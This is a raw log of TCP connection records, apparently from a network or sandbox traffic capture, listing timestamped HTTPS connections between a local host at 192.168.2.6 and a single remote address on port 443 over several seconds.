                                                                                                                                                                        Nov 21, 2024 10:38:23.024413109 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.024456024 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.024487972 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.057457924 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.089823961 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.098887920 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.098906040 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.098938942 CET49956443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.098944902 CET4434995613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.101515055 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.101524115 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.101946115 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.101952076 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.102166891 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.102195024 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.102510929 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.102516890 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.103792906 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.103828907 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.103884935 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.103996038 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.104006052 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.270919085 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.313075066 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.335006952 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.335031986 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.335468054 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.335475922 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.506489038 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.508914948 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.508985996 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.509022951 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.509035110 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.509047031 CET49959443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.509052992 CET4434995913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.511706114 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.511744976 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.511806011 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.511945963 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.511955976 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.535175085 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.538408995 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.538455963 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.538456917 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.538506985 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.538551092 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.538559914 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.538570881 CET49961443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.538573980 CET4434996113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.540903091 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.540941000 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.541006088 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.541116953 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.541127920 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.708025932 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.711129904 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.711215019 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.711249113 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.711263895 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.711276054 CET49962443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.711281061 CET4434996213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.713947058 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.713967085 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.714034081 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.714165926 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.714175940 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.926400900 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.926924944 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.926959991 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:23.927565098 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:23.927578926 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.380178928 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.383327007 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.383500099 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.383542061 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.383562088 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.383599997 CET49963443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.383609056 CET4434996313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.386240959 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.386274099 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.386359930 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.386576891 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.386590004 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.885096073 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.888638020 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.888665915 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:24.889235973 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:24.889242887 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.329840899 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.332869053 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.335524082 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.335582972 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.335582972 CET49966443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.335602045 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.335613966 CET4434996613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.338543892 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.338588953 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.338659048 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.338797092 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.338804007 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.355976105 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.356517076 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.356534004 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.357059002 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.357081890 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.383920908 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.389885902 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.389909029 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.390486956 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.390491962 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.491883039 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.493892908 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.493921041 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.494481087 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.494488001 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.809236050 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.812151909 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.812247038 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.837584019 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.838428020 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.838428020 CET49968443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.838464022 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.838474989 CET4434996813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.840559006 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.840612888 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.842080116 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.842099905 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.842111111 CET49969443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.842117071 CET4434996913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.924318075 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.924366951 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.924415112 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.925051928 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.925087929 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.925141096 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.925676107 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.925695896 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.925785065 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.925796986 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.934750080 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.938473940 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.938559055 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.938685894 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.938704967 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.938719988 CET49971443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.938725948 CET4434997113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.945436954 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.945473909 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:25.945518017 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.946037054 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:25.946052074 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.166488886 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.166985035 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.167016029 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.167653084 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.167660952 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.609707117 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.612982035 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.613131046 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.613953114 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.613953114 CET49972443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.613969088 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.613976955 CET4434997213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.617594957 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.617629051 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:26.617827892 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.617974997 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:26.617983103 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.057044029 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.057631016 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.057650089 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.058126926 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.058130026 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.506083012 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.509207964 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.509262085 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.509293079 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.509336948 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.509380102 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.509407043 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.509433985 CET49974443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.509440899 CET4434997413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.512536049 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.512578964 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.512667894 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.512831926 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.512847900 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.660227060 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.660783052 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.660826921 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.661211014 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.661217928 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.769035101 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.769187927 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.769614935 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.769638062 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.769676924 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.769705057 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.770072937 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.770077944 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:27.770172119 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:27.770178080 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.102193117 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.105020046 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.105123043 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.105161905 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.105182886 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.105195045 CET49978443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.105200052 CET4434997813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.107830048 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.107877016 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.107949972 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.108097076 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.108108044 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.221453905 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.221570015 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.221667051 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.221916914 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.221936941 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.221946001 CET49977443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.221951008 CET4434997713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.222435951 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.222548008 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.222604036 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.222701073 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.222719908 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.222731113 CET49976443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.222735882 CET4434997613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.224687099 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.224735022 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.224826097 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.224879980 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.224908113 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.224967003 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.224967957 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.224981070 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.225163937 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.225173950 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.400295973 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.400784016 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.400814056 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.401241064 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.401247978 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.841953039 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.841989040 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.842113972 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.842140913 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.842411995 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.842421055 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.842436075 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.842585087 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.842619896 CET4434998013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.842660904 CET49980443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.845550060 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.845592022 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:28.845678091 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.845813036 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:28.845825911 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.292115927 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.292706966 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.292723894 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.293174982 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.293179035 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.736105919 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.738692999 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.738751888 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.738792896 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.738816977 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.738883018 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.738883018 CET49982443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.738902092 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.738913059 CET4434998213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.741775036 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.741796970 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.741866112 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.742033958 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.742042065 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.894174099 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.895083904 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.895118952 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.895621061 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.895628929 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.944634914 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.945317984 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.945348024 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:29.946032047 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:29.946049929 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.009273052 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.013431072 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.013451099 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.013887882 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.013891935 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.339831114 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.342885971 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.342941999 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.342972994 CET4434998313.107.246.60192.168.2.6
